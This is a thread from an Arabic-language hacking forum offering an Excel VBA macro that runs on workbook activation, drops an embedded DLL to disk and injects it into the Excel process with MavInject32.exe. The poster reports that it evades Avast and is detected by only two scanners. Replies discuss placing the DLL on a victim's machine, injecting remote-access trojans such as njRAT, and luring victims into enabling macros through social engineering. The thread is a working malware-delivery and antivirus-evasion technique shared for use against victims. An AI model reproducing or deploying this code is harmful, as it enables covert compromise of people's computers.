Another Macro Exploit (Based on process hijacking)

تم تحميل الصفحة في 1,3561572 ثانية
Another Macro Exploit (Based on process hijacking)
إنضم
7 يوليو 2016
المشاركات
117
الإعجابات
198
النقاط
43
الإقامة
Powershell
سلام عليكم ورحمة الله وبركاته,

حبيت أعطي مثال عملي للأستفاده من موضوعي الأخير هنا

اكسل و الورد ايضا يمكن حقنهم بواسطة الطريقه في موضوعي الاخير,

درسنا هذا حيكون كود ماكرو لأستغلال هذه الثغره لحقن عمليه الأكسل ب ملف دي ال ال وتشغيل اتاك.

الهدف ليس نشر ثغره كلين وانما كما ذكرت نشر طريقه لأ ستغلال موضوعي الاخير, ممكن الاستغلال بالفيجول او السي شارب وهناك أفكار عده.

التطبيق تم على Avast وتم التخطي بسلاسه تامه بالرغم من ان عمليه البور شل child process of Excel

ناتج الفحص

مكشوف من حمايتين فقط.

أتركم مع الفيديو

 
إنضم
7 يوليو 2016
المشاركات
117
الإعجابات
198
النقاط
43
الإقامة
Powershell
كود:
'CODED BY Hackitup

Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long ' Declare the API needed to get the process ID
Private Declare Function WinExec Lib "kernel32.dll" ( _
     ByVal lpCmdLine As String, _
     ByVal nCmdShow As Long) As Long ' WinExecu to run command


Private Sub Workbook_activate()


Worksheets("sheet1").OLEObjects.Item(1).Copy  ' copying the dll from the sheet to clipboard.

 CreateObject("Shell.Application") _
 .Namespace(ActiveWorkbook.Path) _
 .Self.InvokeVerb "Paste"  ' pasting the copied file to disk (in the same path of the Excel book, you can change it to any file u desire.)
 
Application.Wait (Now + TimeValue("0:00:2"))
ID = CStr(GetCurrentProcessId) ' get the process ID as string


Application.Wait (Now + TimeValue("0:00:2"))


WinExec "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" + Space(1) + ID + Space(1) + "/INJECTRUNNING" + Space(1) + """" + ActiveWorkbook.Path + "\hello-world.dll" + """", 1 ' execute the injection using MavInject32.exe utility
End Sub
 
إنضم
8 سبتمبر 2013
المشاركات
7,304
الإعجابات
10,886
النقاط
168
الإقامة
1.5
جميلة جداً الطريقة اخي @Hackitup كالعادة مبدع
يعيب الطريقة يمكن ان الملف موجود على الجهاز بمسار حقيقي (اعرف انه dllHijck و حقن لازم موجود ههه بس قصدي على الطريقة ككل)
و أيضاً اتوقع الملف يجب ان يكون native صح ..؟ فيه طريقة شرحتها زمان تخلي مكتبة الـDotNet قابلة للإدارة من النظام مثل مكتبة الـnative ...
تحول ..
.NET = Managed lib
الى ..
Native = Unmanaged lib

يعني تقدر تشفر بالدوت نت و تشغل المكتبة بالطريقة اعلاه
 
إنضم
7 يوليو 2016
المشاركات
117
الإعجابات
198
النقاط
43
الإقامة
Powershell
جميلة جداً الطريقة اخي @Hackitup كالعادة مبدع
يعيب الطريقة يمكن ان الملف موجود على الجهاز بمسار حقيقي (اعرف انه dllHijck و حقن لازم موجود ههه بس قصدي على الطريقة ككل)
و أيضاً اتوقع الملف يجب ان يكون native صح ..؟ فيه طريقة شرحتها زمان تخلي مكتبة الـDotNet قابلة للإدارة من النظام مثل مكتبة الـnative ...
تحول ..
.NET = Managed lib
الى ..
Native = Unmanaged lib

يعني تقدر تشفر بالدوت نت و تشغل المكتبة بالطريقة اعلاه
نعم لابد من نسخ ملف الدي ال ال لجهاز الضحيه, والملف لابد ان يكون نيتف DLL

طريقة النسخ اللي اتبعتها. نسخ للكليبورد ومن ثم لصق في مجلد من اختيارك لا تتحسس منها الحميات لذى لا اراها عيب.

ممكن تعطيني موضوعك ؟ وهل من الممكن تحويل سيرفر رفنج او نجرات الى دي ال ال ونحقنه ؟

و شكرا لك عالمرور
 
إنضم
8 سبتمبر 2013
المشاركات
7,304
الإعجابات
10,886
النقاط
168
الإقامة
1.5
نعم لابد من نسخ ملف الدي ال ال لجهاز الضحيه, والملف لابد ان يكون نيتف DLL

طريقة النسخ اللي اتبعتها. نسخ للكليبورد ومن ثم لصق في مجلد من اختيارك لا تتحسس منها الحميات لذى لا اراها عيب.

ممكن تعطيني موضوعك ؟ وهل من الممكن تحويل سيرفر رفنج او نجرات الى دي ال ال ونحقنه ؟

و شكرا لك عالمرور
الموضوع موجود لكن قديم ..
هذا رابط الفيديو الي في الموضوع
 
إنضم
7 يوليو 2016
المشاركات
117
الإعجابات
198
النقاط
43
الإقامة
Powershell
طريقة اكثر من ممتازة
بعض التعديل على ملف الاكسل وتصبح جاهزة لعمل سوشل انجنيرينق اتاك
حياك الله

تقصد لأقناع الضحيه يتفعيل الماكرو ؟

وشكرا عالمرور
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل